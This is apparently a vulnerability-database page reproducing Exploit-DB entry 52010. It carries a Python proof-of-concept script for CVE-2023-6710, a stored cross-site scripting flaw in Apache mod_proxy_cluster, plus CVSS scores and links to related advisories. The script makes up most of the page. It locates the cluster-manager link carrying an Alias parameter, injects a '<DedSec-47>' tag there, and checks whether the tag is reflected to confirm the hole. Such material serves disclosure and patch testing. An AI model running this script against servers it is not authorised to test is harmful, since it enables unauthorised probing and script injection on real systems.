Lucene search
Mohamed Mounir BoudjemaEDB-ID:52010HistoryMay 13, 2024 - 12:00 a.m.
Apache mod_proxy_cluster - Stored XSS
2024-05-1300:00:00
Mohamed Mounir Boudjema
www.exploit-db.com
23
apache
mod_proxy_cluster
stored xss
exploitation
injection
vulnerability
security document
requests
beautifulsoup
argparse
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
7.4 High
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
30.2%
import requests
import argparse
from bs4 import BeautifulSoup
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
from requests.exceptions import RequestException
class Colors:
RED = '\033[91m'
GREEN = '\033[1;49;92m'
RESET = '\033[0m'
def get_cluster_manager_url(base_url, path):
print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)
try:
response = requests.get(base_url + path)
response.raise_for_status()
except requests.exceptions.RequestException as e:
print(Colors.RED + f"Error: {e}" + Colors.RESET)
return None
print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)
if response.status_code == 200:
print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)
# Use BeautifulSoup to parse the HTML content
soup = BeautifulSoup(response.text, 'html.parser')
# Find all 'a' tags with 'href' attribute
all_links = soup.find_all('a', href=True)
# Search for the link containing the Alias parameter in the href attribute
cluster_manager_url = None
for link in all_links:
parsed_url = urlparse(link['href'])
query_params = parse_qs(parsed_url.query)
alias_value = query_params.get('Alias', [None])[0]
if alias_value:
print(Colors.GREEN + f"Alias value found" + Colors.RESET)
cluster_manager_url = link['href']
break
if cluster_manager_url:
print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)
return cluster_manager_url
else:
print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)
return None
print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")
return None
def update_alias_value(url):
parsed_url = urlparse(url)
query_params = parse_qs(parsed_url.query, keep_blank_values=True)
query_params['Alias'] = ["<DedSec-47>"]
updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))
print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)
return updated_url
def check_response_for_value(url, check_value):
response = requests.get(url)
if check_value in response.text:
print(Colors.RED + "Website is vulnerable POC by :")
print(Colors.GREEN + """
____ _ ____ _ _ _____
| _ \ ___ __| / ___| ___ ___ | || |___ |
| | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / /
| |_| | __/ (_| |___) | __/ (_ |____|__ | / /
|____/ \___|\__,_|____/ \___|\___| |_|/_/
github.com/DedSec-47 """)
else:
print(Colors.GREEN + "Website is not vulnerable POC by :")
print(Colors.GREEN + """
____ _ ____ _ _ _____
| _ \ ___ __| / ___| ___ ___ | || |___ |
| | | |/ _ \/ _` \___ \ / _ \/ __| ____| || | / /
| |_| | __/ (_| |___) | __/ (_ |____|__ | / /
|____/ \___|\__,_|____/ \___|\___| |_|/_/
github.com/DedSec-47 """)
def main():
# Create a command-line argument parser
parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")
# Add a command-line argument for the target (-t/--target)
parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)
# Add a command-line argument for the URL path (-u/--url)
parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)
# Parse the command-line arguments
args = parser.parse_args()
# Get the cluster manager URL from the specified website
cluster_manager_url = get_cluster_manager_url(args.target, args.url)
# Check if the cluster manager URL is found
if cluster_manager_url:
# Modify the URL by adding the cluster manager value
modified_url = args.target + cluster_manager_url
modified_url = update_alias_value(args.target + cluster_manager_url)
print(Colors.GREEN + "Check executed successfully" + Colors.RESET)
# Check the response for the value "<DedSec-47>"
check_response_for_value(modified_url, "<DedSec-47>")
if __name__ == "__main__":
main()Related
githubexploit
githubexploit
Exploit for Cross-site Scripting in Modcluster Mod Proxy Cluster
2023-12-25 09:50:23
Exploit for Cross-site Scripting in Modcluster Mod Proxy Cluster
2023-12-25 09:40:31
cve
cve
CVE-2023-6710
2023-12-12 22:15:22
packetstorm
packetstorm
Apache mod_proxy_cluster Cross Site Scripting
2024-05-14 00:00:00
cvelist
cvelist
CVE-2023-6710 Mod_cluster/mod_proxy_cluster: stored cross site scripting
2023-12-12 22:01:34
nvd
nvd
CVE-2023-6710
2023-12-12 22:15:22
prion
prion
Cross site scripting
2023-12-12 22:15:00
zdt
zdt
Apache mod_proxy_cluster - Stored XSS Exploit
2024-05-13 00:00:00
redhatcve
redhatcve
CVE-2023-6710
2023-12-12 06:27:11
nessus
nessus
RHEL 9 : mod_jk and mod_proxy_cluster (RHSA-2024:2387)
2024-04-30 00:00:00
Oracle Linux 9 : mod_jk / and / mod_proxy_cluster (ELSA-2024-2387)
2024-05-06 00:00:00
almalinux
almalinux
Moderate: mod_jk and mod_proxy_cluster security update
2024-04-30 00:00:00
oraclelinux
oraclelinux
mod_jk and mod_proxy_cluster security update
2024-05-02 00:00:00
redhat
redhat
osv
osv
Moderate: mod_jk and mod_proxy_cluster security update
2024-04-30 00:00:00
ibm
ibm
Security Bulletin: Multiple vulnerabilites in IBM Rational Build Forge.
2024-04-02 13:12:49
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
7.4 High
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
30.2%
Related for EDB-ID:52010